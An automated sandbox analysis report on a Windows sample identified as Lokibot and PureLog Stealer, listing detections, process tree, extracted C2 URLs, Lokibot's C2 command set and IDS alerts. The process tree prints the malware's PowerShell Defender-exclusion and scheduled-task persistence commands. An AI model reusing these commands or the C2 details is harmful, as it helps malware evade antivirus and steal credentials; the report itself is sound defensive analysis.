Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
gunzipped.exe

Overview

General Information

Sample name:gunzipped.exe
Analysis ID:1431964
MD5:4b905e6548f4d5040fab8962cb71877e
SHA1:15c3785700d10e32ce7e17d706194dd9baa8442a
SHA256:6fd2687a66899aa63357f7434a418b2bd873eebda9520129b20fd3e7e889ced1
Tags:exeLoki
Infos:

Detection

Lokibot, PureLog Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Snort IDS alert for network traffic
Yara detected AntiVM3
Yara detected Lokibot
Yara detected PureLog Stealer
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
Adds a directory exclusion to Windows Defender
C2 URLs / IPs found in malware configuration
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Uses schtasks.exe or at.exe to add and modify task schedules
Yara detected aPLib compressed binary
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality to call native functions
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • gunzipped.exe (PID: 6640 cmdline: "C:\Users\user\Desktop\gunzipped.exe" MD5: 4B905E6548F4D5040FAB8962CB71877E)
    • powershell.exe (PID: 6948 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 6696 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 7396 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • schtasks.exe (PID: 7188 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\mPvIOxEZXJsdYp" /XML "C:\Users\user\AppData\Local\Temp\tmp510D.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7208 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • gunzipped.exe (PID: 7320 cmdline: "C:\Users\user\Desktop\gunzipped.exe" MD5: 4B905E6548F4D5040FAB8962CB71877E)
    • gunzipped.exe (PID: 7328 cmdline: "C:\Users\user\Desktop\gunzipped.exe" MD5: 4B905E6548F4D5040FAB8962CB71877E)
  • mPvIOxEZXJsdYp.exe (PID: 7368 cmdline: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exe MD5: 4B905E6548F4D5040FAB8962CB71877E)
    • schtasks.exe (PID: 7500 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\mPvIOxEZXJsdYp" /XML "C:\Users\user\AppData\Local\Temp\tmp5B1F.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7512 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • mPvIOxEZXJsdYp.exe (PID: 7600 cmdline: "C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exe" MD5: 4B905E6548F4D5040FAB8962CB71877E)
    • mPvIOxEZXJsdYp.exe (PID: 7608 cmdline: "C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exe" MD5: 4B905E6548F4D5040FAB8962CB71877E)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Loki Password Stealer (PWS), LokiBot"Loki Bot is a commodity malware sold on underground sites which is designed to steal private data from infected machines, and then submit that info to a command and control host via HTTP POST. This private data includes stored passwords, login credential information from Web browsers, and a variety of cryptocurrency wallets." - PhishMeLoki-Bot employs function hashing to obfuscate the libraries utilized. While not all functions are hashed, a vast majority of them are.Loki-Bot accepts a single argument/switch of -u that simply delays execution (sleeps) for 10 seconds. This is used when Loki-Bot is upgrading itself.The Mutex generated is the result of MD5 hashing the Machine GUID and trimming to 24-characters. For example: B7E1C2CC98066B250DDB2123.Loki-Bot creates a hidden folder within the %APPDATA% directory whose name is supplied by the 8th thru 13th characters of the Mutex. For example: %APPDATA%\ C98066\.There can be four files within the hidden %APPDATA% directory at any given time: .exe, .lck, .hdb and .kdb. They will be named after characters 13 thru 18 of the Mutex. For example: 6B250D. Below is the explanation of their purpose:FILE EXTENSIONFILE DESCRIPTION.exeA copy of the malware that will execute every time the user account is logged into.lckA lock file created when either decrypting Windows Credentials or Keylogging to prevent resource conflicts.hdbA database of hashes for data that has already been exfiltrated to the C2 server.kdbA database of keylogger data that has yet to be sent to the C2 serverIf the user is privileged, Loki-Bot sets up persistence within the registry under HKEY_LOCAL_MACHINE. If not, it sets up persistence under HKEY_CURRENT_USER.The first packet transmitted by Loki-Bot contains application data.The second packet transmitted by Loki-Bot contains decrypted Windows credentials.The third packet transmitted by Loki-Bot is the malware requesting C2 commands from the C2 server. By default, Loki-Bot will send this request out every 10 minutes after the initial packet it sent.Communications to the C2 server from the compromised host contain information about the user and system including the username, hostname, domain, screen resolution, privilege level, system architecture, and Operating System.The first WORD of the HTTP Payload represents the Loki-Bot version.The second WORD of the HTTP Payload is the Payload Type. Below is the table of identified payload types:BYTEPAYLOAD TYPE0x26Stolen Cryptocurrency Wallet0x27Stolen Application Data0x28Get C2 Commands from C2 Server0x29Stolen File0x2APOS (Point of Sale?)0x2BKeylogger Data0x2CScreenshotThe 11th byte of the HTTP Payload begins the Binary ID. This might be useful in tracking campaigns or specific threat actors. This value value is typically ckav.ru. If you come across a Binary ID that is different from this, take note!Loki-Bot encrypts both the URL and the registry key used for persistence using Triple DES encryption.The Content-Key HTTP Header value is the result of hashing the HTTP Header values that precede it. This is likely used as a protection against researchers who wish to poke and prod at Loki-Bots C2 infrastructure.Loki-Bot can accept the following instructions from the C2 Server:BYTEINSTRUCTION DESCRIPTION0x00Download EXE & Execute0x01Download DLL & Load #10x02Download DLL & Load #20x08Delete HDB File0x09Start Keylogger0x0AMine & Steal Data0x0EExit Loki-Bot0x0FUpgrade Loki-Bot0x10Change C2 Polling Frequency0x11Delete Executables & ExitSuricata SignaturesRULE SIDRULE NAME2024311ET TROJAN Loki Bot Cryptocurrency Wallet Exfiltration Detected2024312ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M12024313ET TROJAN Loki Bot Request for C2 Commands Detected M12024314ET TROJAN Loki Bot File Exfiltration Detected2024315ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M12024316ET TROJAN Loki Bot Screenshot Exfiltration Detected2024317ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M22024318ET TROJAN Loki Bot Request for C2 Commands Detected M22024319ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M2
  • SWEED
  • The Gorgon Group
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.lokipws

Malware Configuration

Threatname: Lokibot

{"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php", "http://45.77.223.48/~blog/?ajax=a"]}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Lokibot_1Yara detected LokibotJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000000.00000002.1735179615.0000000003D49000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
      00000000.00000002.1735179615.00000000047D9000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_LokibotYara detected LokibotJoe Security
        00000000.00000002.1735179615.00000000047D9000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_aPLib_compressed_binaryYara detected aPLib compressed binaryJoe Security
          00000000.00000002.1735179615.00000000047D9000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            00000000.00000002.1735179615.00000000047D9000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Lokibot_1f885282unknownunknown
            • 0x17ab8:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
            Click to see the 54 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            0.2.gunzipped.exe.76c0000.11.raw.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
              0.2.gunzipped.exe.3d49970.7.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                0.2.gunzipped.exe.3d49970.7.raw.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                  0.2.gunzipped.exe.76c0000.11.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                    8.2.mPvIOxEZXJsdYp.exe.4a46818.5.raw.unpackJoeSecurity_LokibotYara detected LokibotJoe Security
                      Click to see the 67 entries

                      Sigma Signatures

                      System Summary

                      barindex
                      Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\gunzipped.exe", ParentImage: C:\Users\user\Desktop\gunzipped.exe, ParentProcessId: 6640, ParentProcessName: gunzipped.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exe", ProcessId: 6948, ProcessName: powershell.exe
                      Sigma detected: Powershell Defender Exclusion
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\gunzipped.exe", ParentImage: C:\Users\user\Desktop\gunzipped.exe, ParentProcessId: 6640, ParentProcessName: gunzipped.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exe", ProcessId: 6948, ProcessName: powershell.exe
                      Sigma detected: Suspicious Add Scheduled Task Parent
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\mPvIOxEZXJsdYp" /XML "C:\Users\user\AppData\Local\Temp\tmp5B1F.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\mPvIOxEZXJsdYp" /XML "C:\Users\user\AppData\Local\Temp\tmp5B1F.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exe, ParentImage: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exe, ParentProcessId: 7368, ParentProcessName: mPvIOxEZXJsdYp.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\mPvIOxEZXJsdYp" /XML "C:\Users\user\AppData\Local\Temp\tmp5B1F.tmp", ProcessId: 7500, ProcessName: schtasks.exe
                      Sigma detected: Suspicious Schtasks From Env Var Folder
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\mPvIOxEZXJsdYp" /XML "C:\Users\user\AppData\Local\Temp\tmp510D.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\mPvIOxEZXJsdYp" /XML "C:\Users\user\AppData\Local\Temp\tmp510D.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\gunzipped.exe", ParentImage: C:\Users\user\Desktop\gunzipped.exe, ParentProcessId: 6640, ParentProcessName: gunzipped.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\mPvIOxEZXJsdYp" /XML "C:\Users\user\AppData\Local\Temp\tmp510D.tmp", ProcessId: 7188, ProcessName: schtasks.exe
                      Sigma detected: Non Interactive PowerShell Process Spawned
                      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\gunzipped.exe", ParentImage: C:\Users\user\Desktop\gunzipped.exe, ParentProcessId: 6640, ParentProcessName: gunzipped.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exe", ProcessId: 6948, ProcessName: powershell.exe

                      Persistence and Installation Behavior

                      barindex
                      Sigma detected: Scheduled temp file as task from temp location
                      Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\mPvIOxEZXJsdYp" /XML "C:\Users\user\AppData\Local\Temp\tmp510D.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\mPvIOxEZXJsdYp" /XML "C:\Users\user\AppData\Local\Temp\tmp510D.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\gunzipped.exe", ParentImage: C:\Users\user\Desktop\gunzipped.exe, ParentProcessId: 6640, ParentProcessName: gunzipped.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\mPvIOxEZXJsdYp" /XML "C:\Users\user\AppData\Local\Temp\tmp510D.tmp", ProcessId: 7188, ProcessName: schtasks.exe

                      Snort Signatures

                      Timestamp:04/26/24-04:57:31.331813
                      SID:2024318
                      Source Port:49758
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:57:25.359561
                      SID:2024318
                      Source Port:49752
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:57:09.548217
                      SID:2024312
                      Source Port:49738
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:57:25.359561
                      SID:2021641
                      Source Port:49752
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:57:31.331813
                      SID:2024313
                      Source Port:49758
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:57:31.331813
                      SID:2021641
                      Source Port:49758
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:57:21.056286
                      SID:2024318
                      Source Port:49746
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:57:23.949613
                      SID:2021641
                      Source Port:49749
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:57:25.359561
                      SID:2024313
                      Source Port:49752
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:57:21.056286
                      SID:2024313
                      Source Port:49746
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:57:21.056286
                      SID:2021641
                      Source Port:49746
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:57:23.949613
                      SID:2024318
                      Source Port:49749
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:57:08.113616
                      SID:2021641
                      Source Port:49737
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:57:08.113616
                      SID:2024317
                      Source Port:49737
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:57:16.639664
                      SID:2024313
                      Source Port:49743
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:57:16.639664
                      SID:2021641
                      Source Port:49743
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:57:16.639664
                      SID:2024318
                      Source Port:49743
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:57:29.559162
                      SID:2021641
                      Source Port:49757
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:57:26.717841
                      SID:2021641
                      Source Port:49754
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:57:29.559162
                      SID:2024318
                      Source Port:49757
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:57:29.559162
                      SID:2024313
                      Source Port:49757
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:57:12.236287
                      SID:2021641
                      Source Port:49742
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:57:19.622306
                      SID:2021641
                      Source Port:49745
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:57:12.236287
                      SID:2024318
                      Source Port:49742
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:57:26.717841
                      SID:2024313
                      Source Port:49754
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:57:19.622306
                      SID:2024313
                      Source Port:49745
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:57:26.717841
                      SID:2024318
                      Source Port:49754
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:57:08.113616
                      SID:2024312
                      Source Port:49737
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:57:19.622306
                      SID:2024318
                      Source Port:49745
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:57:12.236287
                      SID:2024313
                      Source Port:49742
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:57:28.121110
                      SID:2024313
                      Source Port:49756
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:57:10.856048
                      SID:2024318
                      Source Port:49741
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:57:23.949613
                      SID:2024313
                      Source Port:49749
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:57:18.033252
                      SID:2024318
                      Source Port:49744
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:57:22.484753
                      SID:2021641
                      Source Port:49747
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:57:10.856048
                      SID:2021641
                      Source Port:49741
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:57:28.121110
                      SID:2021641
                      Source Port:49756
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:57:10.856048
                      SID:2024313
                      Source Port:49741
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:57:18.033252
                      SID:2024313
                      Source Port:49744
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:57:22.484753
                      SID:2024313
                      Source Port:49747
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:57:09.548217
                      SID:2021641
                      Source Port:49738
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:57:28.121110
                      SID:2024318
                      Source Port:49756
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:57:09.548217
                      SID:2024317
                      Source Port:49738
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:57:22.484753
                      SID:2024318
                      Source Port:49747
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/26/24-04:57:18.033252
                      SID:2021641
                      Source Port:49744
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected

                      Joe Sandbox Signatures

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Antivirus detection for URL or domain
                      Source: http://kbfvzoboss.bid/alien/fre.phpURL Reputation: Label: malware
                      Source: http://alphastand.top/alien/fre.phpURL Reputation: Label: malware
                      Source: http://alphastand.win/alien/fre.phpURL Reputation: Label: malware
                      Source: http://alphastand.trade/alien/fre.phpURL Reputation: Label: malware
                      Found malware configuration
                      Source: 00000008.00000002.1765632980.0000000004A2C000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Lokibot {"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php", "http://45.77.223.48/~blog/?ajax=a"]}
                      Multi AV Scanner detection for dropped file
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exeReversingLabs: Detection: 18%
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exeVirustotal: Detection: 32%Perma Link
                      Multi AV Scanner detection for submitted file
                      Source: gunzipped.exeVirustotal: Detection: 32%Perma Link
                      Machine Learning detection for dropped file
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exeJoe Sandbox ML: detected
                      Machine Learning detection for sample
                      Source: gunzipped.exeJoe Sandbox ML: detected
                      Source: gunzipped.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: gunzipped.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                      Networking

                      barindex
                      Snort IDS alert for network traffic
                      Source: TrafficSnort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.4:49737 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49737 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.4:49737 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.4:49738 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49738 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.4:49738 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49741 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49741 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49741 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49742 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49742 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49742 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49743 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49743 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49743 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49744 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49744 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49744 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49745 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49745 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49745 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49746 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49746 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49746 -> 45.77.223.48:80
                      Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49747 -> 45.77.223.48:80
